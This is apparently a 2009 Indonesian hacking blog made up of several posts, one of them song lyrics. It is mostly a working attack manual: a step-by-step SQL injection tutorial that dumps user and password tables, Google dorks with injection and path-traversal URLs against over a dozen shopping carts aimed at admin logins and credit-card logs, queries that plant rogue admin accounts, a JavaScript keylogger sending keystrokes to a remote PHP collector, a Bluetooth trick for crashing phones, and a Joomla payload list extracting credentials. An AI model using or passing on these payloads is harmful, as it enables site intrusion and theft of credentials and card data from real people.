Ze3 deathn0te

Blind SQL Injection Oleh Selalu_ngantuk

o0n_sangaD — Mon, 14 Sep 2009 16:55:06 GMT

Blind SQL Injection Oleh Selalu_ngantuk

sepintas tekhnik ini sama dengan tekhnik SQL pada umumnya...
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

###################
## +step Satu+ ##
###################
carilah target
salah satunya menggunakan search engine pada google !!
sebagai penjelasan klik disini

misal: [site]/berita.php?id=

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

###################
## +step dua+ ##
###################
mencari dan menghitung jumlah table yang ada dalam databasenya...
seperti yang kita ketahui bersama pada SQL injection untuk menghitung jumlah table pada databasenya
menggunakan perintah : order by
contoh :
[site]/berita.php?id=-12 order by 1--
[site]/berita.php?id=-12 order by 2--

hingga muncul pesan error...

*namun untuk kasus tertentu order by tidak dapat digunakan ...
pada blind SQL kita dapat mengetahui jumlah table yang ada dengan cara Melakukan column count !!!

contoh melakuan column count :
union select diikuti dengan angka.

maka: [site]/berita.php?id= union select 1/*
maka: [site]/berita.php?id= union select 1,2/*
maka: [site]/berita.php?id= union select 1,2,3/*

hingga keluar angka pada tampilan web target

anggap yang keluar sampai angka 9
ok angka yg keluar angka 9 dan 2

###################
## +step tiga+ ##
###################

menampilkan table...
pada SQL injection untuk menampilkan table adalah memasukkan perintah group_concat(table_name) pada angka yg keluar tadi
dan perintah +from+information_schema.tables+where+table_schema=database() setelah angka terakhir

contoh :
[site]/berita.php?id=-12+union+select+1,2,3,4,group_concat(table_name),6,7,8+from

+information_schema.tables+where+table_schema=database()--

jika gagal kita dapat mengganti querynya
query yang kita gunakan adalah : union select table_name from information_schema.tables where table_schema=database() limit 0,1
masukan "table_name" pada angka yang keluar (9 atau 2) diikuti "from information_schema.tables where table_schema=database() limit 0,1"
menjadi , [site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 0,1/*

disini saya menggunakan 2.

####################
## +step empat+ ##
####################

mengeluarkan table_name yang lain.
untuk mengeluarkan table_name yang lain ganti nilai limit menjadi , 1,1 , 2,1 , 3,1 ....
hingga mendapatkan table yang kita inginkan !!!

contoh:
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 1,1/*
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 2,1/*
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 3,1/*

dan contoh hasilnya :
1,1 : aktual_berita
2,1 : aktual_kategori
3,1 : berita
4,1 : category
5,1 : iklan
10,1: user

dan tabel yang kita butuhkan ada pada limit 10,1 ( user )

###################
## +step lima+ ##
###################
ada tahap ini kamu wajib mengekstrax kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://ascii-convert.tk/

kata user menjadi : 75736572
maka :
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=user limit 0,1/*
menjadi
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*

untuk mengetahui isi pada table user anda dapat mengganti nilai limit :
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 1,1/*

dan hasilnya :
0,1 : userid
1,1 : password
1,2 : description
1,3 : auth

* Setiap bilangan hexa harus di tambah 0x
contoh : bilangan hexa dari indonesiacoder = 696E646F6E65736961636F646572
bila di gunakan akan menjadi = 0x696E646F6E65736961636F646572

###################
## +step enam+ ##
###################
mengeluarkan field .
query yang kita gunakan adalah : UNION SELECT column_name FROM table_name

column_name :userid, password
table_name :user

masukan column_name pada angka yang keluar kemudian FROM table_name
menjadi,
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from table_name/*

contoh
[site]/berita.php?id=-12 union select 1,password,3,4,5,6,7,8,9 from user/*

* Mengunakan Concatenation
Concatenation adalah kondisi dimana kamu ingin mengeluarkan field dengan banyak colomn_name atau karna kurangnya angka yang keluar saat blind union. untuk string Concatenation pada mysql adalah CONCAT(A,B,C,...)

contoh:
kondisi kurangnya angka yang keluar saat blind union.
column_name : userid, password, description
table_name :user
angka yang keluar: 2 dan 9

bagaimana kita mengeluarkan field dengan 3 column_name sedangkan angka yang keluar hanya 2 (2 dan 9), jawabanya menggunakan concat() tadi.
contoh :
[site]/berita.php?id=-12 union select 1,concat(0x3C3D3E,userid,0x3a,password,0x3a,description,0x3C3D3E),3,4,5,6,7,8,9 from user/*

###################
## +step enam+ ##
###################
tahap terakhir mencari halaman admin atau login

anda dapat menggunakan software intellitamper
http://www.brothersoft.com/intellitamper-download-10958.html <== DOWNLOAD INTELLITAMPER

atau menggunakan jasa http://www.file2hd.com/

<++DOWNLOAD VIDEO++>

mohon maaf jika ada kesalahan atau kekurangan dalam tutorial saya...

Terima kasihku untuk Allah.swt , Muhammad.saw , Seluruh Keluarga besar ku dan ALL DEFACER INDONESIA .

..:: VIVA INDONESIA HACKING ::..

Greatz : Paman / Jack , X-shadow , Gonzhack , Dontukulesto , D3viln3t , M364TR0N , Cyb3R_tr0n , bayu5154 , tucker , petrucii , M3NW5 , Mr.Joker , #00000

Spesial thanks to : INDONESIACODER CREW , DEFACER.BIZ CREW , PAGUNCODING CREW and all member cyberdos

Rapat tecon ...kikiikikiki

o0n_sangaD — Sun, 13 Sep 2009 04:14:16 GMT

Shopadmin ...how to get it

o0n_sangaD — Sat, 12 Sep 2009 04:44:22 GMT

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi? ... t_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem CShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order...

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bi ... 001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplaypro ... 9;%20union%...,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?p ... ction&key=
Tambah dengan --> ...&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi? ... template...

13. contoh bugs pada bentuk toko sistem roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem igishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="
Password : 'or"="

sumber :
http://tecon-crew.org/forum/viewtopic.php?f=25&t=32

Ngisengin Hp sohib kamu dengan bluetooth

o0n_sangaD — Sat, 12 Sep 2009 04:33:30 GMT

Males ane ngetik uteng...jadi copas aja lo punya ...keokeokekoe

Dengan sedikit trik, anda bisa merestart HP symbian teman anda tanpa harus melakukan kontak fisik Anda bisa membuat kontes dengan teman-teman anda..

Langkah"

Bukalah Notepad kemudian ketik " (tanda kutip) lalu tekan tombol [Tab] dan ketiklah Restart kemudian tekan tombol [Tab] lagi dan akhiri dengan " (tanda kutip). Bingung yach? nich contohnya: " Restart " Ingat yach, setelah tanda kutip yang harus anda tekan adalah tombol [Tab], bukan space.
2.

Setelah itu, simpan file tersebut dengan nama Restart.txt atau apa aja laah.. kirim file tersebut ke HP anda melalui bluetooth atau apaa aja
3.

Kini cobalah buka file tadi di HP anda, Copy teks yang tadi anda ketikkan.
4.

Buka settingan Bluetooth anda, ubah namanya menjadi teks yang tadi anda copy. Tinggal paste ajah. Ups, kenapa?? namanya jadi kacau yach?? tenang ajah, itu tandanya anda berhasil :P

Datangi teman anda, katakan hal-hal menarik yang bisa membuat dia terkagum-kagum. Misalnya:

"Bro, gue bisa bikin HP loe restart tanpa harus gue sentuh. Coba sekarang loe pake bluetooth loe."

Saat teman anda mengaktifkan bluetooth nya, HP Sysmbiannya akan otomatis restart

Atau anda bisa mengusili orang-orang di sekeliling anda yang sedang memakai bluetooth >_<

How it can BE??

Mudah saja, Symbian akan mendeteksi keberadaan bluetooth yang aktif, namun tidak bisa menampilkan device bluetoothnya karena dia tidak pernah mengenal karakter Tab. Hal ini akan mengakibatkan ERROR sehingga dia akan melakukan restart system secara otomatis.

Iseng Ahhh huehue

o0n_sangaD — Sat, 12 Sep 2009 03:17:49 GMT

halah ..sial ...gw di kasi script buat ngisengin modzilla...script ini memang rada aneh ,,,,,xixixix tapi lumayun klo mo nyoba.....silahkon....paste di url yach ....:D

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++) {DIS=DI[i].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++} setInterval('A()',5); void(0);

Jiahh situs indobokep di bajak...kwokwokw

o0n_sangaD — Fri, 11 Sep 2009 08:53:36 GMT

weleh pas mau nyari2 pilem bagus ,,jiahh gak taunya udah di depes...btw goodluck ,deh om
heheh and lagunya cakep hehehe
bersih-bersih ahhh....

Agnes Monica - Matahariku

o0n_sangaD — Fri, 11 Sep 2009 07:03:24 GMT

Lirik :

tertutup sudah pintu, pintu hatiku



yang pernah dibuka waktu, hanya untukmu
kini kau pergi dari hidupku
ku harus relakanmu walau aku tak mau

* berjuta warna pelangi di dalam hati



sejenak luluh bergeming menjauh pergi
tak ada lagi cahaya suci
semua nada beranjak, aku terdiam sepi

** dengarlah matahariku suara tangisanku



ku bersedih karna panah cinta menusuk jantungku
ucapkan matahariku puisi tentang hidupku
tentangku yang tak mampu melakukan waktu

repeat *

dengarkanlah kau matahariku

dengarlah matahariku suara tangisanku

ku bersedih karna panah cinta menusuk jantungku

repeat **

Koleksi Agnes Monica yang lain.
Mp3 Download & Lirik Lagu Agnes Monica – Matahariku (OST Jelita)
Gambar Artis Indonesia Link Download Klik di sini

Keylogger - JavaScript

o0n_sangaD — Fri, 11 Sep 2009 04:18:48 GMT

Pertama bukalah notepad kesayangan kalian atau yang lainnya kayak Wordpad, Notepad ++... Pokoknya terserah dah...

Kemudian paste kode berikut:

[+]------------------------------------------------------------------

 var key = '';

 var space = ' '

 function start()

 var xmlhttp;

 if (window.XMLHttpRequest)

 // code for IE7+, Firefox, Chrome, Opera, Safari

 xmlhttp=new XMLHttpRequest();

 else if (window.ActiveXObject)

 // code for IE6, IE5

 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");

 else

 alert("Browser Kamu Tidak Support XMLHTTP!");

 xmlhttp.open("POST","http://websitekamu/buka.php",true);

 xmlhttp.send(null);

 function ajaxFunction()

 var xmlhttp;

 if (window.XMLHttpRequest)

 // code for IE7+, Firefox, Chrome, Opera, Safari

 xmlhttp=new XMLHttpRequest();

 else if (window.ActiveXObject)

 // code for IE6, IE5

 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");

 else

 alert("Your browser does not support XMLHTTP!");

 xmlhttp.open("POST","http://websitekamu/salin.php?d="+key,true);

 xmlhttp.send(null);

 document.write('');


 [+]------------------------------------------------------------------


 Lalu simpan dengan nama keylog.js... Inget Bro, ekstensinya JS. Dan satu lagi jangan lupa, 
"websitekamu" diganti dengan

 URL kamu sendiri...

 Buat lagi buka.php dan salin.php di notepad dengan script sebagai berikut


 buka.php


 [+]------------------------------------------------------------------


 $data = $_GET['d'];

 $fp = fopen('hasil.txt', 'a');

 fwrite($fp, $data);

 fclose($fp);

?>

[+]------------------------------------------------------------------

salin.php

[+]------------------------------------------------------------------

 $data = $_GET['d'];

 $fp = fopen('hasil.txt', 'a');

 fwrite($fp, $data);

 fclose($fp);

?>

[+]------------------------------------------------------------------

Maka sekarang kalian mempunyai tiga file yaitu keylog.js, buka.php, salin.php...
Nah karena saya mencoba di localhost maka saya akan mencoba membuat script HTML sederhana
yang akan digunakan sebagai website saya sendiri.

[+]------------------------------------------------------------------

Jasakom Community

Ketik Apa Aja Yang Kamu Suka

[+]------------------------------------------------------------------

Dan simpan dengan nama jasakom.html

Nah apabila kalian ingin menaruhnya di website kalian maka kalian cukup menambahkan

[+]------------------------------------------------------------------

Dah ngerti? Sekarang letakkan keempat file tersebut jasakom.html, keylog.js, buka.php dan mulai.php
di dalam direktori yang sama. Nah kalo saya di direktori C:wampwwwwebsitesaya

karena saya menggunakan WAMP server

Nah maka dari itu saya akan mengganti URL yang ada di keylog.js menjadi
[+]------------------------------------------------------------------
http://localhost/websitesaya
[+]------------------------------------------------------------------
Praktek
Maka ketika kalian membuka Browser kalian dan mengarahkan ke http://localhost/websitesaya/jasakom.html
Nah disini kalian bisa ketik apa aja
Saya akan ketik "Makasih Banyak Dah Membuang Waktu Kalian Yang Berharga Untuk Melihat Artikel Ini"
Maka kalian akan melihat munculnya hasil.txt yang berisi kata2 tersebut
sumber asli : www.jasakom.com - by : cruzen

Wew Jobla lagee nihhh

zee-eichel — Thu, 10 Sep 2009 19:31:42 GMT

Jalan sore-sore ke forum lumajangCrew eh dapet ginian

Jomla Live chat

Dork:
allinurl:option=com_livechat

Exploit :
administrator/components/com_livechat/getChat.php?chat=0&last=1=+union+select+
1,unhex(hex(concat(username,0x3a,password))),3,4+from+jos_users

administrator/components/com_livechat/getSavedChatRooms.php?chat=
0&last=1+union+select+1,unhex(hex(concat(username,0x3a,password))),3+from+jos_users

Joomla "option=com_juser"
info http://milw0rm.com/exploits/8847

Dork:
inurl:option=com_juser

exploit:
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat
(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

Joomla "com_jvideo"
info dari http://milw0rm.com/exploits/8821

Dork :
inurl:option=com_jvideo
inurl:com_jvideo

exploit:
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat
(username,0x3a,password)+from+jos_users

Joomla "option=com_juser"
info http://milw0rm.com/exploits/8847

Dork:
inurl:option=com_juser

exploit:
Code:
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat
(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

Joomla com_ewriting

Dorks:
allinurl:"com_ewriting"

Exploit :
Joomla!
index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

Mambo
index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

Joomla com_simple_review Sql injection

Dork:
inurl:"com_simple_review"

Exploit:
index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws
(username,0x3a,password),2+from+jos_users--

Joomla Qur'an component

DORK :
inurl:"/index.php?option=com_quran"
allinurl:"com_quran"

Exploit :

Mambo
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Joomla Component com_cinema SQL Injection

DORK
allinurl: "com_cinema"

EXPLOiT 1 :
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/
**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,
31,32,concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOiT 2 :
[/i]index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/
**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,
concat(username,0x3a,password)/**/from/**/jos_users/*

Joomla Component joomradio Remote SQL Injection

DORK:
inurl:com_joomradio

Exploit :
Code:
index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--